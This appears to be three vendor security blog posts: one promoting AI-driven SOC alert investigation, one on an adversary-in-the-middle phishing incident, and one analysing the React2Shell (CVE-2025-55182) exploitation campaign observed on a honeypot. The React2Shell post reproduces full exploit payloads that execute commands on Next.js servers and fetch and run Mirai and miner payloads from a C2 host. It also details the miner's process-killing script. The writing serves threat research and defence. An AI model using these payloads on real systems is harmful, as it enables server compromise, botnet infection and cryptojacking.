January 30, 2025

Reimagining Your SOC: Overcoming Alert Fatigue with AI-Led Investigations  

Reimagining your SOC Part 2/3: This blog explores how the challenges facing the modern SOC can be addressed by transforming the investigation process, unlocking efficiency and scalability in SOC operations with AI.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Brittany Woodsmall
Product Marketing Manager, AI & Attack Surface

The efficiency of a Security Operations Center (SOC) hinges on its ability to detect, analyze and respond to threats effectively. With advancements in AI and automation, key early SOC team metrics such as Mean Time to Detect (MTTD) have seen significant improvements:

  • 96% of defenders believe AI-powered solutions significantly boost the speed and efficiency of prevention, detection, response, and recovery.
  • Organizations leveraging AI and automation can shorten their breach lifecycle by an average of 108 days compared to those without these technologies.

While these tool advances have improved performance and effectiveness in the detection phase, they have done far less for the next step of the process, where initial alerts are investigated further to determine their relevance and how they relate to other activity. This step is often measured with the metric Mean Time to Analysis (MTTA), although some SOC teams operate a two-level process, with one team performing initial triage to filter out obviously uninteresting alerts and another performing more detailed analysis of the remainder. SOC teams continue to grapple with alert fatigue, overwhelmed analysts, and inefficient triage processes, preventing them from achieving the operational efficiency necessary for a high-performing SOC.

Addressing this core inefficiency requires extending AI's capabilities beyond detection to streamline and optimize the investigative workflows that underpin effective analysis.

Challenges with SOC alert investigation

Detecting cyber threats is only the beginning of a much broader challenge of SOC efficiency. The real bottleneck often lies in the investigation process.

Detection tools and techniques have evolved significantly with the use of machine learning, improving early threat detection. However, once a detection is raised, human analysts still typically step in to evaluate the alert, gather context, and determine whether it is a true threat or a false alarm, and why. If it is a threat, further investigation must be performed to understand the full scope of what may be a much larger problem. This phase, measured by Mean Time to Analysis, is critical for swift incident response.

Challenges with manual alert investigation:

  • Too many alerts
  • Alerts lack context
  • Cognitive load sits with analysts
  • Insufficient talent in the industry
  • Fierce competition for experienced analysts

For many organizations, investigation is where the struggle of efficiency intensifies. Analysts face overwhelming volumes of alerts, a lack of consolidated context, and the mental strain of juggling multiple systems. With a worldwide shortage of 4 million experienced level two and three SOC analysts, the cognitive burden placed on teams is immense, often leading to alert fatigue and missed threats.

Even with advanced systems in place, not all potential detections are investigated. In many cases, only a quarter of initial alerts are triaged (or analyzed). However, the issue runs deeper. Triaging occurs after detection engineering and alert tuning, which often disable many alerts that could reveal true threats but are not accurate enough to justify the security team's time and effort. This means some potential threats slip through unnoticed.

Understanding alerts in the SOC: Stopping cyber incidents is hard

Let’s take a look at the cyber-attack lifecycle and the steps involved in detecting and stopping an attack:

First we need a trace of an attack…

The attack will produce some sort of digital trace. Novel attacks, insider threats, and attacker techniques such as living-off-the-land can make attacker activities extremely hard to distinguish.

A detection is created…

Then we have to detect the trace, for example some beaconing to a rare domain. The raising of initial detection alerts underpins MTTD (mean time to detect). Reducing this initial unseen duration is where we have seen significant improvement with modern threat detection tools.

When it comes to threat detection, the possibilities are vast. Your initial lead could come from anything: an alert about unusual network activity, a potential known malware detection, or an odd email. Once that lead comes in, it’s up to your security team to investigate further and determine whether it is a legitimate threat or a false alarm, and what the context is behind the alert.

Investigation begins…

It doesn’t just stop at a detection. Typically, humans also need to look at the alert, investigate, understand, analyze, and conclude whether this is a genuine threat that needs a response. We normally measure this as MTTA (mean time to analyze).

Conducting the investigation effectively requires a high degree of skill and efficiency, as every second counts in mitigating potential damage. Security teams must analyze the available data, correlate it across multiple sources, and piece together the timeline of events to understand the full scope of the incident. This process involves navigating vast amounts of information, identifying patterns, and discerning relevant details, all while managing the pressure of minimizing downtime and preventing further escalation.

Containment begins…

Once we confirm something as a threat, and the human team determines that a response is required and understands the scope, we need to contain the incident. This is normally measured as MTTC (mean time to containment), which can be further split into immediate and more permanent measures.
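The three lifecycle metrics discussed here (MTTD, MTTA, MTTC) can be computed directly from incident timestamps. The sketch below is a minimal illustration; the record fields and example timestamps are hypothetical, not drawn from any real product.

```python
from datetime import datetime, timedelta

def mean_delta(incidents, start_key, end_key):
    """Average time between two lifecycle timestamps across incidents."""
    deltas = [i[end_key] - i[start_key] for i in incidents]
    return sum(deltas, timedelta()) / len(deltas)

# Hypothetical incident records: when the attack trace first appeared,
# and when it was detected, analyzed, and contained.
incidents = [
    {"trace": datetime(2025, 1, 1, 9, 0),
     "detected": datetime(2025, 1, 1, 9, 20),
     "analyzed": datetime(2025, 1, 1, 11, 0),
     "contained": datetime(2025, 1, 1, 12, 0)},
    {"trace": datetime(2025, 1, 2, 14, 0),
     "detected": datetime(2025, 1, 2, 14, 10),
     "analyzed": datetime(2025, 1, 2, 16, 30),
     "contained": datetime(2025, 1, 2, 17, 0)},
]

mttd = mean_delta(incidents, "trace", "detected")      # mean time to detect
mtta = mean_delta(incidents, "detected", "analyzed")   # mean time to analyze
mttc = mean_delta(incidents, "analyzed", "contained")  # mean time to contain
```

Tracking all three side by side makes it visible when detection improves but analysis stalls, which is exactly the gap this series describes.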

For more about how AI-led solutions can help in the containment stage read here: Autonomous Response: Streamlining Cybersecurity and Business Operations

The challenge is not only in 1) detecting threats quickly, but also 2) triaging and investigating them rapidly and with precision, and 3) prioritizing the most critical findings to avoid missed opportunities. Effective investigation demands a combination of advanced tools, robust workflows, and the expertise to interpret and act on the insights they generate. Without these, organizations risk delaying critical containment and response efforts, leaving them vulnerable to greater impacts.

While there are further steps (remediation, and of course complete recovery) here we will focus on investigation.

Developing an AI analyst: How Darktrace replicates human investigation

Darktrace has been working on understanding the investigative process of a skilled analyst since 2017. By conducting internal research between Darktrace expert SOC analysts and machine learning engineers, we developed a formalized understanding of investigative processes. This understanding formed the basis of a multi-layered AI system that systematically investigates data, taking advantage of the speed and breadth afforded by machine systems.

With this research we found that the investigative process often revolves around iterating three key steps: hypothesis creation, data collection, and results evaluation.

All these details are crucial for an analyst to determine the nature of a potential threat. They are equally central to our Cyber AI Analyst, an integral component across our product suite. Through it, Darktrace has been able to replicate the human-driven approach to investigating alerts at machine speed and scale.

Here’s how it works:

  • When an initial or third-party alert is triggered, the Cyber AI Analyst initiates a forensic investigation by building multiple hypotheses and gathering relevant data to confirm or refute the nature of suspicious activity, iterating as necessary, and continuously refining the original hypothesis as new data emerges throughout the investigation.
  • Using a combination of machine learning including supervised and unsupervised methods, NLP and graph theory to assess activity, this investigation engine conducts a deep analysis with incidents raised to the human team only when the behavior is deemed sufficiently concerning.
  • After classification, the incident information is organized and processed to generate the analysis summary, including the most important descriptive details, and priority classification, ensuring that critical alerts are prioritized for further action by the human-analyst team.
  • If the alert is deemed unimportant, the complete analysis process is made available to the human team so that they can see what investigation was performed and why this conclusion was drawn.
Figure: Darktrace Cyber AI Analyst workflow.

To illustrate this via example, if a laptop is beaconing to a rare domain, the Cyber AI Analyst would create hypotheses including whether this could be command and control traffic, data exfiltration, or something else. The AI analyst then collects data, analyzes it, makes decisions, iterates, and ultimately raises a new high-level incident alert describing and detailing its findings for human analysts to review and follow up.
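The three-step loop described earlier (hypothesis creation, data collection, results evaluation) can be sketched in a simplified form. Everything below, the hypothesis names, evidence fields, scoring, and thresholds, is hypothetical and only illustrates the iterative shape of such a process, not Darktrace's actual implementation.

```python
# Illustrative sketch of a hypothesis-driven investigation loop:
# create hypotheses, collect data, evaluate, iterate until confident.

def investigate(alert, max_iterations=3):
    hypotheses = {"c2_traffic": 0.5, "data_exfiltration": 0.5}  # priors
    for _ in range(max_iterations):
        evidence = collect_evidence(alert)
        for name in hypotheses:
            hypotheses[name] = evaluate(name, evidence, hypotheses[name])
        # Stop iterating once one explanation clearly dominates.
        best = max(hypotheses.values())
        if best > 0.9 or best < 0.1:
            break
    verdict = max(hypotheses, key=hypotheses.get)
    return verdict, hypotheses[verdict]

def collect_evidence(alert):
    # Stand-in for querying connection logs around the alert.
    return {"beacon_regularity": 0.95, "bytes_out_ratio": 0.1}

def evaluate(name, evidence, score):
    # Toy scoring: regular beaconing with little outbound data supports C2;
    # heavy outbound data would instead support exfiltration.
    if name == "c2_traffic":
        return min(1.0, score + 0.3 * evidence["beacon_regularity"])
    return max(0.0, score - 0.3 * (1 - evidence["bytes_out_ratio"]))

verdict, confidence = investigate({"device": "laptop-42", "domain": "rare.example"})
```

For the beaconing laptop example, the regular connection cadence strengthens the command-and-control hypothesis on each pass while the low outbound volume weakens the exfiltration one, so the loop converges on a C2 verdict.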

Learn more about Darktrace's Cyber AI Analyst

  • Cost savings: Equivalent to adding up to 30 full-time Level 2 analysts without increasing headcount
  • Minimize business risk: Takes on the busy work from human analysts and elevates a team’s overall decision making
  • Improve security outcomes: Identifies subtle, sophisticated threats through holistic investigations

Unlocking an efficient SOC

To create a mature and proactive SOC, addressing the inefficiencies in the alert investigation process is essential. By extending AI's capabilities beyond detection, SOC teams can streamline and optimize investigative workflows, reducing alert fatigue and enhancing analyst efficiency.

This holistic approach not only improves Mean Time to Analysis (MTTA) but also ensures that SOCs are well-equipped to handle the evolving threat landscape. Embracing AI augmentation and automation in every phase of threat management will pave the way for a more resilient and proactive security posture, ultimately leading to a high-performing SOC that can effectively safeguard organizational assets.

Every relevant alert is investigated

The Cyber AI Analyst is not a generative AI system, nor an XDR or SIEM aggregator that simply prompts you on what to do next. It uses a multi-layered combination of many different specialized AI methods to investigate every relevant alert from across your enterprise, whether native, third-party, or manually triggered, operating at machine speed and scale. This also positively affects detection engineering and alert tuning, because it does not suffer from fatigue when presented with low-accuracy but potentially valuable alerts.

Retain and improve analyst skills

Transferring most analysis processes to AI systems can erode team skills if analysts no longer maintain or build them, and if the AI does not explain its process. This reduces the team's ability to challenge or build on the AI's results, and causes problems if the AI is ever unavailable. The Cyber AI Analyst, by revealing its investigation process, data gathering, and decisions, promotes and improves these skills. Its deep understanding of cyber incidents can also be used for skills training and incident response practice, simulating incidents for security teams to handle.

Create time for cyber risk reduction

Human cybersecurity professionals excel in areas that require critical thinking, strategic planning, and nuanced decision-making. With alert fatigue minimized and investigations streamlined, your analysts can avoid the tedious data collection and analysis stages and instead focus on critical decision-making tasks such as implementing recovery actions and performing threat hunting.

Stay tuned for part 3/3

Part 3/3 in the Reimagine your SOC series explores the preventative security solutions market and effective risk management strategies.

Coming soon!


December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

What is an Adversary-in-the-Middle (AiTM) attack?

Adversary-in-the-Middle (AiTM) attacks are a sophisticated technique often paired with phishing campaigns to steal user credentials. Unlike traditional phishing, which multi-factor authentication (MFA) increasingly mitigates, AiTM attacks leverage reverse proxy servers to intercept authentication tokens and session cookies. This allows attackers to bypass MFA entirely and hijack active sessions, stealthily maintaining access without repeated logins.

This blog examines a real-world incident detected during a Darktrace customer trial, highlighting how Darktrace / EMAIL™ and Darktrace / IDENTITY™ identified the emerging compromise in a customer’s email and software-as-a-service (SaaS) environment, tracked its progression, and could have intervened at critical moments to contain the threat had Darktrace’s Autonomous Response capability been enabled.

What does an AiTM attack look like?

Inbound phishing email

Attacks typically begin with a phishing email, often originating from the compromised account of a known contact like a vendor or business partner. These emails often contain malicious links or attachments leading to fake login pages that spoof legitimate platforms, such as Microsoft 365, and are designed to harvest user credentials.

Proxy-based credential theft and session hijacking

When a user clicks on a malicious link, they are redirected through an attacker-controlled proxy that impersonates legitimate services. This proxy forwards login requests to Microsoft, making the login page appear legitimate. After the user successfully completes MFA, the attacker captures credentials and session tokens, enabling full account takeover without the need for reauthentication.
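Because the attacker replays a valid token from new infrastructure, one simple defensive heuristic is to compare the client context in which a session token is used against the context in which it was issued. This is a minimal sketch under assumed field names and an in-memory store, not any vendor's actual detection logic.

```python
# Hypothetical record store: token -> (client_ip, user_agent) at login time.
issued_tokens = {}

def record_login(token, client_ip, user_agent):
    """Remember where a session token was originally issued."""
    issued_tokens[token] = (client_ip, user_agent)

def is_suspicious_use(token, client_ip, user_agent):
    """True if a token reappears from an unfamiliar client context."""
    origin = issued_tokens.get(token)
    if origin is None:
        return True  # token never seen at login: possible proxy capture
    return (client_ip, user_agent) != origin

record_login("tok123", "203.0.113.5", "Edge/131")
legit = is_suspicious_use("tok123", "203.0.113.5", "Edge/131")
hijack = is_suspicious_use("tok123", "198.51.100.9", "curl/8.5.0")
```

Real implementations baseline much richer context (ASN, geolocation, device posture) rather than exact IP/user-agent matches, but the underlying comparison is the same.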

Follow-on attacks

Once inside, attackers will typically establish persistence through the creation of email rules or registering OAuth applications. From there, they often act on their objectives, exfiltrating sensitive data and launching additional business email compromise (BEC) campaigns. These campaigns can include fraudulent payment requests to external contacts or internal phishing designed to compromise more accounts and enable lateral movement across the organization.

Darktrace’s detection of an AiTM attack

At the end of September 2025, Darktrace detected one such example of an AiTM attack on the network of a customer trialling Darktrace / EMAIL and Darktrace / IDENTITY.

In this instance, the first indicator of compromise observed by Darktrace was the creation of a malicious email rule on one of the customer’s Office 365 accounts, suggesting the account had likely already been compromised before Darktrace was deployed for the trial.

Darktrace / IDENTITY observed the account creating a new email rule with a randomly generated name, likely to hide its presence from the legitimate account owner. The rule marked all inbound emails as read and deleted them, while ignoring any existing mail rules on the account. This rule was likely intended to conceal any replies to malicious emails the attacker had sent from the legitimate account owner and to facilitate further phishing attempts.
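The rule's behavior, a random-looking name combined with all inbound mail being marked read and deleted, can be expressed as a simple heuristic. The rule schema below is hypothetical (not a real mailbox API), and the entropy threshold is illustrative.

```python
import math
from collections import Counter

def shannon_entropy(s):
    """Bits per character; randomly generated rule names score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_malicious(rule):
    """Heuristic for hide-the-evidence inbox rules like the one described.
    The rule schema here is hypothetical."""
    hides_mail = rule.get("mark_as_read") and rule.get("delete")
    broad_scope = rule.get("applies_to") == "all_inbound"
    random_name = shannon_entropy(rule.get("name", "")) > 3.5
    return hides_mail and broad_scope and random_name

rule = {"name": "q8Zk2vYw1pLr", "mark_as_read": True,
        "delete": True, "applies_to": "all_inbound"}
```

A benign cleanup rule ("Newsletters", mark-as-read only) fails both the delete and random-name checks, so it would not be flagged.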

Figure 1: Darktrace’s detection of the anomalous email rule creation.

Internal and external phishing

Following the creation of the email rule, Darktrace / EMAIL observed a surge of suspicious activity on the user’s account. The account sent emails with subject lines referencing payment information to over 9,000 different external recipients within just one hour. Darktrace also identified that these emails contained a link to an unusual Google Drive endpoint, embedded in the text “download order and invoice”.
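Volume anomalies like this one can be caught with a windowed distinct-recipient count. The sketch below assumes a simple (timestamp, sender, recipient) event stream and an illustrative fixed threshold; real systems baseline per-account behavior instead.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def surge_accounts(events, window=timedelta(hours=1), threshold=1000):
    """Flag accounts that email too many distinct recipients in one window."""
    per_account = defaultdict(list)  # account -> [(time, recipient)]
    for t, account, recipient in sorted(events):
        per_account[account].append((t, recipient))
    flagged = set()
    for account, sends in per_account.items():
        for i, (start, _) in enumerate(sends):
            recipients = {r for t, r in sends[i:] if t - start <= window}
            if len(recipients) >= threshold:
                flagged.add(account)
                break
    return flagged

# Synthetic burst: one account mailing 1,200 distinct recipients in 20 minutes.
base = datetime(2025, 9, 30, 10, 0)
events = [(base + timedelta(seconds=s), "victim@example.com", f"ext{s}@other.com")
          for s in range(1200)]
flagged = surge_accounts(events)
```

Against the incident described above, a burst of over 9,000 distinct external recipients in one hour would clear any reasonable per-account baseline by orders of magnitude.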

Figure 2: Darktrace’s detection of an unusual surge in outbound emails containing suspicious content, shortly following the creation of a new email rule.
Figure 3: Darktrace / EMAIL’s detection of the compromised account sending over 9,000 external phishing emails, containing an unusual Google Drive link.

As Darktrace / EMAIL flagged the message with the ‘Compromise Indicators’ tag (Figure 2), it would have been held automatically if the customer had enabled default Data Loss Prevention (DLP) Action Flows in their email environment, preventing any external phishing attempts.

Figure 4: Darktrace / EMAIL’s preview of the email sent by the offending account.

Darktrace analysis revealed that, after clicking the malicious link in the email, recipients would be redirected to a convincing landing page that closely mimicked the customer’s legitimate branding, including authentic imagery and logos, where they were prompted to download a PDF named “invoice”.

Figure 5: Download and login prompts presented to recipients after following the malicious email link, shown here in safe view.

After clicking the “Download” button, users would be prompted to enter their company credentials on a page that was likely a credential-harvesting tool, designed to steal corporate login details and enable further compromise of SaaS and email accounts.

Darktrace’s Response

In this case, Darktrace’s Autonomous Response was not fully enabled across the customer’s email or SaaS environments, allowing the compromise to progress as observed by Darktrace.

Despite this, Darktrace / EMAIL’s successful detection of the malicious Google Drive link in the internal phishing emails prompted it to suggest ‘Lock Link’ as a recommended action for the customer’s security team to apply manually. This action would have placed the malicious link behind a warning or screening page, blocking users from visiting it.

Figure 6: Autonomous Response suggesting locking the malicious Google Drive link sent in internal phishing emails.

Furthermore, if active in the customer’s SaaS environment, Darktrace would likely have been able to mitigate the threat even earlier, at the point of the first unusual activity: the creation of a new email rule. Mitigative actions would have included forcing the user to log out, terminating any active sessions, and disabling the account.

Conclusion

AiTM attacks represent a significant evolution in credential theft techniques, enabling attackers to bypass MFA and hijack active sessions through reverse proxy infrastructure. In the real-world case we explored, Darktrace’s AI-driven detection identified multiple stages of the attack, from anomalous email rule creation to suspicious internal email activity, demonstrating how Autonomous Response could have contained the threat before escalation.

MFA is a critical security measure, but it is no longer a silver bullet. Attackers are increasingly targeting session tokens rather than passwords, exploiting trusted SaaS environments and internal communications to remain undetected. Behavioral AI provides a vital layer of defense by spotting subtle anomalies that traditional tools often miss.

Security teams must move beyond static defenses and embrace adaptive, AI-driven solutions that can detect and respond in real time. Regularly review SaaS configurations, enforce conditional access policies, and deploy technologies that understand “normal” behavior to stop attackers before they succeed.

Credit to David Ison (Cyber Analyst), Bertille Pierron (Solutions Engineer), Ryan Traill (Analyst Content Lead)

Appendices

Models

SaaS / Anomalous New Email Rule

Tactic – Technique – Sub-Technique  

Phishing - T1566

Adversary-in-the-Middle - T1557

About the author
David Ison
Cyber Analyst

December 15, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

What is React2Shell?

CVE-2025-55182, also known as React2Shell, is a vulnerability in React Server Components that allows an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and its ease of exploitation led threat actors to begin opportunistically exploiting it within days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing exploitation of the vulnerability to be monitored in the wild.

Cloudypots is a system that deploys virtual instances of vulnerable applications in the cloud and monitors them for attack. This approach allows Darktrace to deploy high-interaction, realistic honeypots that appear to attackers as genuine deployments of vulnerable software.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server at IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provider known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts roughly every hour.

When scanning, the spreader primarily targets port 3000, the default port for a Next.js server in a default or development configuration. The attacker may be avoiding ports 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.
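Defenders hunting for this activity in their own web-server logs could look for the markers visible in the crafted request above. The marker list below is drawn only from the payloads shown in this post and is illustrative, not an exhaustive or official signature.

```python
import re

# Markers taken from the crafted requests shown above.
MARKERS = [
    re.compile(r'\$B1337'),                # resolved-model chain trigger
    re.compile(r'child_process'),          # node module used for execution
    re.compile(r'NEXT_REDIRECT.*digest'),  # error-digest exfil of command output
]

def suspicious_requests(log_lines, min_hits=2):
    """Return log lines matching at least min_hits exploit markers."""
    return [line for line in log_lines
            if sum(bool(m.search(line)) for m in MARKERS) >= min_hits]

logs = [
    'POST / {"value": "{\\"then\\":\\"$B1337\\"}", "_prefix": "...child_process..."}',
    'GET /favicon.ico 200',
]
hits = suspicious_requests(logs)
```

Requiring two or more markers keeps incidental mentions of a single string (for example, `child_process` in benign traffic) from firing on their own.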

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to deploy several payloads by using wget (or curl if wget fails) into the /dev directory and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations to regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’ that match on a specific name. It will check for and terminate:

  • xmrig
  • softirq (this also matches a legitimate system process, which the script repeatedly fails to kill)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script checks for a process named “fghgf”. If it is not running, it retrieves hxxp://89[.]144.31.18/nuts/lc and writes it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script then executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background, which is an XMRig miner.

Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads each one’s /proc/pid/exe path, which points to the original executable that was run. The ‘strings’ utility is run to extract all valid ASCII strings from the binary, and the script checks whether the output contains “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to terminate the process.

Additionally, it runs ‘ls -l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program:

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
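Hosts can be checked for the filesystem artifacts this campaign drops. The paths below come from the analysis above; the check itself is a minimal illustration with an injected filesystem lookup so it can be exercised safely, not a full IoC scanner.

```python
import os

# Artifact paths described in the Nuts & Bolts analysis above.
ARTIFACT_PATHS = [
    "/dev/fghgf",             # renamed XMRig binary
    "/dev/ijnegrrinje.json",  # miner configuration
    "/dev/stink.sh",          # competitor-killer script
    "/dev/x86",               # Mirai payload
]

def find_artifacts(paths=ARTIFACT_PATHS, exists=os.path.exists):
    """Return any campaign artifacts present on this host."""
    return [p for p in paths if exists(p)]

# Example with an injected check, so the sketch never touches the real /dev.
fake_fs = {"/dev/stink.sh"}
found = find_artifacts(exists=fake_fs.__contains__)
```

On a real host one would call `find_artifacts()` with the default `os.path.exists`; any non-empty result for these paths in /dev would warrant immediate investigation.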

Darktrace observations in customer environments  

Following the public disclosure of CVE-2025-55182 on December 3, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell-script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoints. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement, attempting SMB and RDP sessions with other internal devices on the network. This chain of events ties the activity to the campaign exploiting the React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  
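The parameterized loader URIs can be decomposed with standard URL parsing. The parameter meanings (h = host, p = port, t = protocol) are inferred from their names in the observed requests, and the example below uses a documentation IP (192.0.2.1) rather than a live IoC.

```python
from urllib.parse import urlsplit, parse_qs

# Query keys seen in the parameterized loader requests described above.
LOADER_KEYS = {"h", "p", "t", "a", "stage"}

def parse_loader_uri(uri):
    """Extract the stager's callback details, or None if not a loader URI."""
    qs = parse_qs(urlsplit(uri).query)
    if not LOADER_KEYS.issubset(qs):
        return None
    return {"host": qs["h"][0], "port": int(qs["p"][0]), "proto": qs["t"][0]}

hit = parse_loader_uri("/?h=192.0.2.1&p=3001&t=tcp&a=l64&stage=true")
miss = parse_loader_uri("/index.html?page=2")
```

Run over proxy or web-server logs, this kind of parser turns opaque request strings into callback host/port pairs that can be fed straight into blocklists or retro-hunts.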

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign to exploit React2Shell is not particularly sophisticated, it demonstrates that attackers can rapidly prototype new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that applying patches as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead), and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

About the author
Nathaniel Bill
